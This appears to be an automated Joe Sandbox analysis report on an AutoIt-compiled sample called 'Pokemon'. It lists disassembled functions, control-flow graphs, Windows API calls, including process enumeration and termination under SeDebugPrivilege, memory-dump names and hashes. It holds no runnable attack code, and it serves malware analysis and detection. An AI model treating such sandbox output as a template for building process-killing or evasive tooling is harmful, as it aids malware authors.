                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29C1B070A04289AFDB15DFA8DC49FEDBBF4AF09310F18419DE954A7392C7709A42CB61
                                                                                                                                                                                                                                                                                      Function 000AAC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 741 aac3e-ab063 call 98ec0 call abc58 call 9e6a0 748 ab069-ab073 741->748 749 e8584-e8591 741->749 750 ab079-ab07e 748->750 751 e896b-e8979 748->751 752 e8596-e85a5 749->752 753 e8593 749->753 758 e85b2-e85b4 750->758 759 ab084-ab090 call ab5b6 750->759 756 e897e 751->756 757 e897b 751->757 754 e85aa 752->754 755 e85a7 752->755 753->752 754->758 755->754 760 e8985-e898e 756->760 757->756 764 e85bd 758->764 759->764 766 ab096-ab0a3 call 9c98d 759->766 762 e8993 760->762 763 e8990 760->763 768 e899c-e89eb call 9e6a0 call abbbe * 2 762->768 763->762 767 e85c7 764->767 774 ab0ab-ab0b4 766->774 772 e85cf-e85d2 767->772 800 ab1e0-ab1f5 768->800 809 e89f1-e8a03 call ab5b6 768->809 776 ab158-ab16f 772->776 777 e85d8-e8600 call b4cd3 call 97ad5 772->777 775 ab0b8-ab0d6 call b4d98 774->775 794 ab0d8-ab0e1 775->794 795 ab0e5 775->795 782 e8954-e8957 776->782 783 ab175 776->783 820 e862d-e8651 call 97b1a call 9bd98 777->820 821 e8602-e8606 777->821 787 e895d-e8960 782->787 788 e8a41-e8a79 call 9e6a0 call abbbe 782->788 789 e88ff-e8920 call 9e6a0 783->789 790 ab17b-ab17e 783->790 787->768 791 e8962-e8965 787->791 788->800 845 e8a7f-e8a91 call ab5b6 788->845 789->800 813 e8926-e8938 call ab5b6 789->813 792 e8729-e8743 call abbbe 790->792 793 ab184-ab187 790->793 791->751 791->800 831 e888f-e88b5 call 9e6a0 792->831 832 e8749-e874c 792->832 801 e86ca-e86e0 call 96c03 793->801 802 ab18d-ab190 793->802 794->775 803 ab0e3 794->803 795->767 805 ab0eb-ab0fc 795->805 815 ab1fb-ab20b call 9e6a0 800->815 816 e8ac9-e8acf 800->816 801->800 848 e86e6-e86fc call ab5b6 801->848 811 e8656-e8659 802->811 812 ab196-ab1b8 call 9e6a0 802->812 803->805 805->751 814 ab102-ab11c 805->814 836 e8a2f-e8a3c call 9c98d 809->836 837 e8a05-e8a0d 809->837 811->751 828 e865f-e8674 call 96c03 811->828 812->800 852 ab1ba-ab1cc call ab5b6 812->852 855 e893a-e8943 call 9c98d 813->855 856 e8945 813->856 814->772 827 ab122-ab154 call abbbe call 9e6a0 814->827 816->774 833 e8ad5 816->833 820->811 821->820 822 e8608-e862b call 9ad40 821->822 822->820 822->821 827->776 828->800 875 e867a-e8690 call ab5b6 828->875 831->800 878 e88bb-e88cd call ab5b6 831->878 843 e874e-e8751 832->843 844 e87bf-e87de call 9e6a0 832->844 833->751 889 e8ac2-e8ac4 836->889 850 e8a1e-e8a29 call 9b4b1 837->850 851 e8a0f-e8a13 837->851 858 e8ada-e8ae8 843->858 859 e8757-e8774 call 9e6a0 843->859 844->800 881 e87e4-e87f6 call ab5b6 844->881 893 e8ab5-e8abe call 9c98d 845->893 894 e8a93-e8a9b 845->894 882 e86fe-e870b call 98ec0 848->882 883 e870d-e8716 call 98ec0 848->883 850->836 900 e8b0b-e8b19 850->900 851->850 868 e8a15-e8a19 851->868 901 e86ba-e86c3 call 9c98d 852->901 902 ab1d2-ab1de 852->902 874 e8949-e894f 855->874 856->874 865 e8aed-e8afd 858->865 866 e8aea 858->866 859->800 904 e877a-e878c call ab5b6 859->904 884 e8aff 865->884 885 e8b02-e8b06 865->885 866->865 886 e8aa1-e8aa3 868->886 874->800 914 e869d-e86ab call 98ec0 875->914 915 e8692-e869b call 9c98d 875->915 919 e88de 878->919 920 e88cf-e88dc call 9c98d 878->920 881->800 922 e87fc-e8805 call ab5b6 881->922 923 e8719-e8724 call 98577 882->923 883->923 884->885 885->815 886->800 889->800 893->889 905 e8a9d 894->905 906 e8aa8-e8ab3 call 9b4b1 894->906 911 e8b1e-e8b21 900->911 912 e8b1b 900->912 901->801 902->800 935 e878e-e879d call 9c98d 904->935 936 e879f 904->936 905->886 906->893 906->900 911->760 912->911 943 e86ae-e86b5 914->943 915->943 930 e88e2-e88e9 919->930 920->930 948 e8818 922->948 949 e8807-e8816 call 9c98d 922->949 923->800 938 e88eb-e88f0 call 9396b 930->938 939 e88f5 call 93907 930->939 945 e87a3-e87ae call b9334 935->945 936->945 938->800 947 e88fa 939->947 943->800 945->751 959 e87b4-e87ba 945->959 947->800 954 e881c-e883f 948->954 949->954 957 e884d-e8850 954->957 958 e8841-e8848 954->958 960 e8852-e885b 957->960 961 e8860-e8863 957->961 958->957 959->800 960->961 962 e8865-e886e 961->962 963 e8873-e8876 961->963 962->963 963->800 964 e887c-e888a 963->964 964->800
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                                      • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                                      • Opcode ID: e790285939d4b0fb32a9a0a3bee36ef9b6f2bc74c8369fb576674f47e5863536
                                                                                                                                                                                                                                                                                      • Instruction ID: 782bd6acb3a3d58b7c2b2eec636ff17a7d49ac309d6d51987e32cd10fc115813
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e790285939d4b0fb32a9a0a3bee36ef9b6f2bc74c8369fb576674f47e5863536
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97627C70508781CFC728DF25D584AAABBE0FF89304F14896EE499AB352DB71D945CF82
                                                                                                                                                                                                                                                                                      Function 0011AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 965 11ab3f-11ab6e call 98ec0 call fdd87 969 11ab73-11ab76 965->969 970 11abb9-11abbd 969->970 971 11ab78-11ab98 call 9e6a0 969->971 972 11abc3-11abd7 OpenProcess 970->972 973 11ad29-11ad3a call 9e6a0 970->973 980 11ab9a 971->980 981 11ab9d-11abac 971->981 975 11acc2-11accd TerminateProcess 972->975 976 11abdd-11abe6 GetLastError 972->976 986 11ad3c-11ad44 973->986 982 11ad20-11ad27 CloseHandle 975->982 983 11accf-11acf1 GetLastError call 97b71 975->983 984 11ac72-11ac8f call 97b71 976->984 985 11abec-11ac06 call fd715 call f2010 976->985 980->981 987 11abb1-11abb4 981->987 988 11abae 981->988 982->986 995 11acf3 983->995 996 11acf6-11ad06 983->996 998 11ac91 984->998 999 11ac94-11aca4 984->999 1007 11ac08-11ac18 OpenProcess 985->1007 1008 11ac1a-11ac38 call 97b71 985->1008 987->986 988->987 995->996 1000 11ad08 996->1000 1001 11ad0b-11ad19 call 9e6a0 996->1001 998->999 1003 11aca6 999->1003 1004 11aca9-11acb7 call 9e6a0 999->1004 1000->1001 1001->982 1003->1004 1013 11acbe-11acc0 1004->1013 1011 11ac67-11ac70 call f1a0b 1007->1011 1016 11ac3a 1008->1016 1017 11ac3d-11ac4d 1008->1017 1011->1013 1013->975 1013->986 1016->1017 1019 11ac52-11ac60 call 9e6a0 1017->1019 1020 11ac4f 1017->1020 1019->1011 1020->1019
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 000FDDAC
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDD87: Process32FirstW.KERNEL32(00000000,?), ref: 000FDDBA
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDD87: CloseHandle.KERNEL32(00000000), ref: 000FDE87
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0011ABCA
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0011ABDD
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0011AC10
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0011ACC5
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 0011ACD0
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0011AD21
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                      • Opcode ID: 236534d23c43f54395dcd5a8513220429de9ea1cdafe157ab6d4e8bd4573bed6
                                                                                                                                                                                                                                                                                      • Instruction ID: da05d5bda2e5940727f10caf795ef543a3475977f55b4ff98c0f389d18c06798
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 236534d23c43f54395dcd5a8513220429de9ea1cdafe157ab6d4e8bd4573bed6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9661CF70209641AFD728DF14C495FA5BBE1AF44318F5484ACE46A8FBA3C771EC85CB92
                                                                                                                                                                                                                                                                                      Function 000935B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1059 935b3-93623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000935E1
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00093602
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00093368,?), ref: 00093616
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00093368,?), ref: 0009361F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                      • Opcode ID: a1a88bce66c40425cef130cd6571ec0098dd996b7a3843897e0acf845c6ffadd
                                                                                                                                                                                                                                                                                      • Instruction ID: eb9a14766920a2ba5790cb64741372d751f2d3fbdb85cf389c9e17d979db69d9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1a88bce66c40425cef130cd6571ec0098dd996b7a3843897e0acf845c6ffadd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAF0DA716406947AEB315717BC09E373EBDE7CAF54B11001EF904A76A0D7F91891DAB0
                                                                                                                                                                                                                                                                                      Function 000961A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1154 961a9-961c0 1155 962a8-962ad 1154->1155 1156 961c6-961db call 97ad5 1154->1156 1159 d5278-d5287 LoadStringW 1156->1159 1160 961e1-961fd call 98577 1156->1160 1163 d5292-d529b 1159->1163 1164 d52ae-d52bc call 95cf9 1160->1164 1165 96203-96207 1160->1165 1166 96229-962a3 call b26b0 call 962ae call b4cf3 Shell_NotifyIconW call 9bd98 1163->1166 1167 d52a1-d52a9 call 9bed9 1163->1167 1164->1166 1176 d52c2-d52cd call fa392 1164->1176 1165->1163 1169 9620d-96224 call 96b7c call 97bb5 1165->1169 1166->1155 1167->1166 1169->1166 1184 d52cf-d52f5 call 9bf73 call fa350 call 97bb5 call 9bd98 1176->1184 1185 d52fa-d5331 call fa31c call afe6f call 96b7c call 95cf9 call 96b7c 1176->1185 1184->1185 1185->1166
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000D5287
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00096299
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                      • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                      • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                      • Opcode ID: a0ce88f983016cf4155df64b40014499ccd8b3bd8997c51ba0de390ff9c1718c
                                                                                                                                                                                                                                                                                      • Instruction ID: 0412be7337bcb12fccdd0a5f6554a0ddda6081d99b8279b9ba00171486ebf3e8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0ce88f983016cf4155df64b40014499ccd8b3bd8997c51ba0de390ff9c1718c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C41DA714087046ECB21EB60EC45EEF77ECAF89320F00451EF99992192EF759689D792
                                                                                                                                                                                                                                                                                      Function 000C8A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,OV,000C894C,?,00159CE8,0000000C,000C89AB,?,OV,?,000D564F), ref: 000C8A84
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000C8A8E
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 000C8AB9
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                      • String ID: OV
                                                                                                                                                                                                                                                                                      • API String ID: 2583163307-383227264
                                                                                                                                                                                                                                                                                      • Opcode ID: f8c8e0802fb40775c1c6aa76b9197a41bf83b2ba34ac87caeb25b205163452d7
                                                                                                                                                                                                                                                                                      • Instruction ID: d398db3eb316ce578a66ff2c547fe21dc74998b0d095a60e7b7753bc42f1fbdc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8c8e0802fb40775c1c6aa76b9197a41bf83b2ba34ac87caeb25b205163452d7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 060166326091607AE6646334BC46FBE27894B81734F2A421EF8149B1E3DF709DC1538A
                                                                                                                                                                                                                                                                                      Function 000958CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,000958BE,SwapMouseButtons,00000004,?), ref: 000958EF
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,000958BE,SwapMouseButtons,00000004,?), ref: 00095910
                                                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,000958BE,SwapMouseButtons,00000004,?), ref: 00095932
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                      • Opcode ID: 56ab514ef0f6fb870dddf06c1e44748edb82d4a22979415a65db0c9411f1068a
                                                                                                                                                                                                                                                                                      • Instruction ID: 165e4cafa806adc87dc1bee725f3f7382aad9965846813d3efbef61a9e909102
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56ab514ef0f6fb870dddf06c1e44748edb82d4a22979415a65db0c9411f1068a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4117C75510618FFEF228F65DC84DAE77B8EF01761F104419F801E7220E2319E52A764
                                                                                                                                                                                                                                                                                      Function 0009F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Variable must be of type 'Object'., xrefs: 000E48C6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                                      • API String ID: 0-109567571
                                                                                                                                                                                                                                                                                      • Opcode ID: 99b75bc003644c82031a09ba3cd2051d5d4745683e3ea8a0e800e198a99197b9
                                                                                                                                                                                                                                                                                      • Instruction ID: 77fd6a79f80bb6d97f3f074853b292bc27bf7e261d09a61b5412f1526871e325
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99b75bc003644c82031a09ba3cd2051d5d4745683e3ea8a0e800e198a99197b9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06C26971A0020ADFCF24CF98C880ABEB7F1BF09314F248569E955AB392D775AD41DB91
                                                                                                                                                                                                                                                                                      Function 000A0340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 000A15F2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a11d05cc1518125a36b3947c4bbf29d500b9797fdcfe54935ee21d161f9837cb
                                                                                                                                                                                                                                                                                      • Instruction ID: d4910bdb02df1afd1bb50455fe2264907fd59195f499d627af6bac5542a0c37a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a11d05cc1518125a36b3947c4bbf29d500b9797fdcfe54935ee21d161f9837cb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1B2BB74A08344CFCB64CF58C880A6AB7F1BF9A304F24491DE99A9B352D771ED41CB92
                                                                                                                                                                                                                                                                                      Function 000B014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 000B09D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B3614: RaiseException.KERNEL32(?,?,?,000B09FA,?,00000000,?,?,?,?,?,?,000B09FA,00000000,00159758,00000000), ref: 000B3674
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 000B09F5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
